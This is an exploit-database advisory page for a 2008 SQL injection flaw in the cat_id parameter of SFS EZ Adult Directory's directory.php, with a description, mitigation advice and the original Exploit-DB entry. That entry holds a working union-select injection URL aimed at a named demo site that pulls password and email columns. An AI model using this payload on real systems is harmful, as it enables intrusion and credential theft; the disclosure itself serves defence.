SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability

vendor:

SFS EZ Adult Directory

by:

Darckc0de

CVSS

HIGH

SQL Injection

CWE

Product Name: SFS EZ Adult Directory

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in SFS EZ Adult Directory. An attacker can exploit this vulnerability to gain access to sensitive information such as passwords and emails. This vulnerability is due to improper sanitization of user-supplied input in the 'cat_id' parameter of the 'directory.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, the application should validate user-supplied input and sanitize it before using it in SQL queries.

Source

Exploit-DB raw data:

==================================================================================
   SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability
==================================================================================
			   __  __           __          
			   / / / /_  _______/ /__  __  __
			  / /_/ / / / / ___/ / _ \/ / / /
			 / __  / /_/ / /  / /  __/ /_/ / 
			/_/ /_/\__,_/_/  /_/\___/\__, /  
			                        /____/   
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
----------------------------------------------------------------------------------
LiveDemo:
http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
----------------------------------------------------------------------------------
==================================================================================
Special Thx : Darckc0de
==================================================================================

# milw0rm.com [2008-10-31]